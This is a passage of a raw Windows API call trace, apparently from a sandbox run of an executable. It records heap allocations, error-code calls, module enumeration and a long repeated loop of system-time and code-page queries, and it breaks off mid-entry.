[0043.927] RtlAllocateHeap (HeapHandle=0x1eb0000, Flags=0x8, Size=0x37) returned 0x1eb1b08 [0043.967] RtlAllocateHeap (HeapHandle=0x1eb0000, Flags=0x8, Size=0x3c) returned 0x1eb1b48 [0043.967] RtlAllocateHeap (HeapHandle=0x1eb0000, Flags=0x8, Size=0x31) returned 0x1eb1b90 [0043.967] RtlAllocateHeap (HeapHandle=0x1eb0000, Flags=0x8, Size=0x17) returned 0x1eb1bd0 [0043.967] RtlAllocateHeap (HeapHandle=0x1eb0000, Flags=0x8, Size=0x24) returned 0x1eb1bf0 [0043.967] RtlAllocateHeap (HeapHandle=0x1eb0000, Flags=0x8, Size=0x14) returned 0x1eb1c20 [0043.968] RtlAllocateHeap (HeapHandle=0x1eb0000, Flags=0x8, Size=0xd) returned 0x1eb1c40 [0043.968] RtlAllocateHeap (HeapHandle=0x1eb0000, Flags=0x8, Size=0x25) returned 0x1eb1c58 [0043.968] RtlAllocateHeap (HeapHandle=0x1eb0000, Flags=0x8, Size=0x39) returned 0x1eb1c88 [0043.968] RtlAllocateHeap (HeapHandle=0x1eb0000, Flags=0x8, Size=0x18) returned 0x1eb1cd0 [0043.968] RtlAllocateHeap (HeapHandle=0x1eb0000, Flags=0x8, Size=0x17) returned 0x1eb1cf0 [0043.968] RtlAllocateHeap (HeapHandle=0x1eb0000, Flags=0x8, Size=0xe) returned 0x1eb1d10 [0043.968] RtlAllocateHeap (HeapHandle=0x1eb0000, Flags=0x8, Size=0x69) returned 0x1eb1d28 [0043.968] RtlAllocateHeap (HeapHandle=0x1eb0000, Flags=0x8, Size=0x3e) returned 0x1eb1da0 [0043.968] RtlAllocateHeap (HeapHandle=0x1eb0000, Flags=0x8, Size=0x1b) returned 0x1eb1de8 [0043.968] RtlAllocateHeap (HeapHandle=0x1eb0000, Flags=0x8, Size=0x1d) returned 0x1eb1e10 [0043.968] RtlAllocateHeap (HeapHandle=0x1eb0000, Flags=0x8, Size=0x48) returned 0x1eb1e38 [0043.968] RtlAllocateHeap (HeapHandle=0x1eb0000, Flags=0x8, Size=0x12) returned 0x1eb1e88 [0043.968] RtlAllocateHeap (HeapHandle=0x1eb0000, Flags=0x8, Size=0x18) returned 0x1eb1ea8 [0043.968] RtlAllocateHeap (HeapHandle=0x1eb0000, Flags=0x8, Size=0x1b) returned 0x1eb1ec8 [0043.968] RtlAllocateHeap (HeapHandle=0x1eb0000, Flags=0x8, Size=0x24) returned 0x1eb1ef0 [0043.968] RtlAllocateHeap (HeapHandle=0x1eb0000, Flags=0x8, Size=0x29) returned 0x1eb1f20 [0043.968] RtlAllocateHeap (HeapHandle=0x1eb0000, Flags=0x8, Size=0x1e) returned 0x1eb1f58 [0043.968] RtlAllocateHeap (HeapHandle=0x1eb0000, Flags=0x8, Size=0x41) returned 0x1eb1f80 [0043.968] RtlAllocateHeap (HeapHandle=0x1eb0000, Flags=0x8, Size=0x17) returned 0x1eb1fd0 [0043.968] RtlAllocateHeap (HeapHandle=0x1eb0000, Flags=0x8, Size=0xf) returned 0x1eb1ff0 [0043.968] RtlAllocateHeap (HeapHandle=0x1eb0000, Flags=0x8, Size=0x16) returned 0x1eb2008 [0043.968] RtlAllocateHeap (HeapHandle=0x1eb0000, Flags=0x8, Size=0x2a) returned 0x1eb2028 [0043.968] RtlAllocateHeap (HeapHandle=0x1eb0000, Flags=0x8, Size=0x29) returned 0x1eb2060 [0043.968] RtlAllocateHeap (HeapHandle=0x1eb0000, Flags=0x8, Size=0x15) returned 0x1eb2098 [0043.968] RtlAllocateHeap (HeapHandle=0x1eb0000, Flags=0x8, Size=0x1e) returned 0x1eb20b8 [0043.968] RtlAllocateHeap (HeapHandle=0x1eb0000, Flags=0x8, Size=0x2a) returned 0x1eb20e0 [0043.968] RtlAllocateHeap (HeapHandle=0x1eb0000, Flags=0x8, Size=0x12) returned 0x1eb2118 [0043.968] RtlAllocateHeap (HeapHandle=0x1eb0000, Flags=0x8, Size=0x18) returned 0x1eb2138 [0043.968] RtlAllocateHeap (HeapHandle=0x1eb0000, Flags=0x8, Size=0x46) returned 0x1eb2158 [0043.968] HeapFree (in: hHeap=0x1eb0000, dwFlags=0x0, lpMem=0x1eb11f8 | out: hHeap=0x1eb0000) returned 1 [0043.969] RtlAllocateHeap (HeapHandle=0x1eb0000, Flags=0x8, Size=0x800) returned 0x1eb21a8 [0043.969] RtlAllocateHeap (HeapHandle=0x1eb0000, Flags=0x8, Size=0x80) returned 0x1eb11f8 [0043.969] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404e49) returned 0x0 [0043.970] RtlSizeHeap (HeapHandle=0x1eb0000, Flags=0x0, MemoryPointer=0x1eb11f8) returned 0x80 [0043.970] GetLastError () returned 0x0 [0043.970] SetLastError (dwErrCode=0x0) [0043.970] GetLastError () returned 0x0 [0043.970] SetLastError (dwErrCode=0x0) [0043.970] GetLastError () returned 0x0 [0043.970] SetLastError (dwErrCode=0x0) [0043.970] GetLastError () returned 0x0 [0043.970] SetLastError (dwErrCode=0x0) [0043.970] GetLastError () returned 0x0 [0043.970] SetLastError (dwErrCode=0x0) [0043.970] GetLastError () returned 0x0 [0043.970] SetLastError (dwErrCode=0x0) [0043.970] GetLastError () returned 0x0 [0043.970] SetLastError (dwErrCode=0x0) [0043.970] GetLastError () returned 0x0 [0043.970] SetLastError (dwErrCode=0x0) [0043.970] GetLastError () returned 0x0 [0043.971] SetLastError (dwErrCode=0x0) [0043.976] GetLastError () returned 0x0 [0043.977] SetLastError (dwErrCode=0x0) [0043.977] GetLastError () returned 0x0 [0043.977] SetLastError (dwErrCode=0x0) [0043.977] GetLastError () returned 0x0 [0043.977] SetLastError (dwErrCode=0x0) [0043.977] GetLastError () returned 0x0 [0043.977] SetLastError (dwErrCode=0x0) [0043.977] GetLastError () returned 0x0 [0043.977] SetLastError (dwErrCode=0x0) [0043.977] GetLastError () returned 0x0 [0043.977] SetLastError (dwErrCode=0x0) [0043.977] GetLastError () returned 0x0 [0043.977] SetLastError (dwErrCode=0x0) [0043.977] GetLastError () returned 0x0 [0043.977] SetLastError (dwErrCode=0x0) [0043.977] GetLastError () returned 0x0 [0043.977] SetLastError (dwErrCode=0x0) [0043.977] GetLastError () returned 0x0 [0043.977] SetLastError (dwErrCode=0x0) [0043.977] GetLastError () returned 0x0 [0043.977] SetLastError (dwErrCode=0x0) [0043.977] GetLastError () returned 0x0 [0043.977] SetLastError (dwErrCode=0x0) [0043.977] GetLastError () returned 0x0 [0043.977] SetLastError (dwErrCode=0x0) [0043.977] GetLastError () returned 0x0 [0043.977] SetLastError (dwErrCode=0x0) [0043.978] GetLastError () returned 0x0 [0043.978] SetLastError (dwErrCode=0x0) [0043.978] GetLastError () returned 0x0 [0043.978] SetLastError (dwErrCode=0x0) [0043.978] GetLastError () returned 0x0 [0043.978] SetLastError (dwErrCode=0x0) [0043.978] GetLastError () returned 0x0 [0043.978] SetLastError (dwErrCode=0x0) [0043.978] GetLastError () returned 0x0 [0043.978] SetLastError (dwErrCode=0x0) [0043.978] GetLastError () returned 0x0 [0043.978] SetLastError (dwErrCode=0x0) [0043.978] GetLastError () returned 0x0 [0043.978] SetLastError (dwErrCode=0x0) [0043.978] GetLastError () returned 0x0 [0043.978] SetLastError (dwErrCode=0x0) [0043.978] GetLastError () returned 0x0 [0043.978] SetLastError (dwErrCode=0x0) [0043.978] GetLastError () returned 0x0 [0043.978] SetLastError (dwErrCode=0x0) [0043.978] GetLastError () returned 0x0 [0043.978] SetLastError (dwErrCode=0x0) [0043.978] GetLastError () returned 0x0 [0043.978] SetLastError (dwErrCode=0x0) [0043.978] GetLastError () returned 0x0 [0043.978] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76c20000 [0043.979] GetProcAddress (hModule=0x76c20000, lpProcName="CreateToolhelp32Snapshot") returned 0x76c5735f [0043.979] GetProcAddress (hModule=0x76c20000, lpProcName="Module32FirstW") returned 0x76c579f9 [0043.979] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x78 [0043.980] Module32FirstW (hSnapshot=0x78, lpme=0x18fac8) returned 0 [0043.980] PeekMessageA (in: lpMsg=0x18fa44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x18fa44) returned 0 [0043.981] GetTickCount () returned 0x1144912 [0043.981] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.981] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.981] GetACP () returned 0x4e4 [0043.981] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.981] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.981] GetACP () returned 0x4e4 [0043.981] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.981] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.981] GetACP () returned 0x4e4 [0043.981] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.981] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.981] GetACP () returned 0x4e4 [0043.981] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.981] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.981] GetACP () returned 0x4e4 [0043.981] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.981] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.981] GetACP () returned 0x4e4 [0043.981] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.981] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.981] GetACP () returned 0x4e4 [0043.981] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.981] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.981] GetACP () returned 0x4e4 [0043.981] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.982] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.982] GetACP () returned 0x4e4 [0043.982] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.982] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.982] GetACP () returned 0x4e4 [0043.982] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.982] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.982] GetACP () returned 0x4e4 [0043.982] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.982] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.982] GetACP () returned 0x4e4 [0043.982] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.982] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.982] GetACP () returned 0x4e4 [0043.982] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.982] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.982] GetACP () returned 0x4e4 [0043.982] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.982] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.982] GetACP () returned 0x4e4 [0043.982] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.982] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.982] GetACP () returned 0x4e4 [0043.982] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.983] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.983] GetACP () returned 0x4e4 [0043.983] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.983] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.983] GetACP () returned 0x4e4 [0043.983] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.983] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.983] GetACP () returned 0x4e4 [0043.983] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.983] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.983] GetACP () returned 0x4e4 [0043.983] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.983] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.983] GetACP () returned 0x4e4 [0043.983] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.983] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.983] GetACP () returned 0x4e4 [0043.983] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.983] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.983] GetACP () returned 0x4e4 [0043.983] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.983] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.983] GetACP () returned 0x4e4 [0043.983] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.983] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.983] GetACP () returned 0x4e4 [0043.983] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.983] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.984] GetACP () returned 0x4e4 [0043.984] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.984] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.984] GetACP () returned 0x4e4 [0043.984] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.984] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.984] GetACP () returned 0x4e4 [0043.984] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.984] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.984] GetACP () returned 0x4e4 [0043.984] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.984] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.984] GetACP () returned 0x4e4 [0043.984] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.984] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.984] GetACP () returned 0x4e4 [0043.984] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.984] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.984] GetACP () returned 0x4e4 [0043.984] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.984] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.984] GetACP () returned 0x4e4 [0043.984] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.984] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.984] GetACP () returned 0x4e4 [0043.984] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.984] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.984] GetACP () returned 0x4e4 [0043.985] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.985] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.985] GetACP () returned 0x4e4 [0043.985] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.985] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.985] GetACP () returned 0x4e4 [0043.985] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.985] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.985] GetACP () returned 0x4e4 [0043.985] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.985] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.985] GetACP () returned 0x4e4 [0043.985] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.985] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.985] GetACP () returned 0x4e4 [0043.985] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.985] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.985] GetACP () returned 0x4e4 [0043.985] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.985] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.985] GetACP () returned 0x4e4 [0043.985] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.985] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.985] GetACP () returned 0x4e4 [0043.985] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.985] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.985] GetACP () returned 0x4e4 [0043.985] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.985] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.986] GetACP () returned 0x4e4 [0043.986] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.986] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.986] GetACP () returned 0x4e4 [0043.986] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.986] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.986] GetACP () returned 0x4e4 [0043.986] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.986] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.986] GetACP () returned 0x4e4 [0043.986] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.986] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.986] GetACP () returned 0x4e4 [0043.986] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.986] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.986] GetACP () returned 0x4e4 [0043.986] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.986] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.986] GetACP () returned 0x4e4 [0043.986] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.986] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.986] GetACP () returned 0x4e4 [0043.986] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.986] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.986] GetACP () returned 0x4e4 [0043.986] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.986] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.986] GetACP () returned 0x4e4 [0043.986] GetSystemTimes (in: 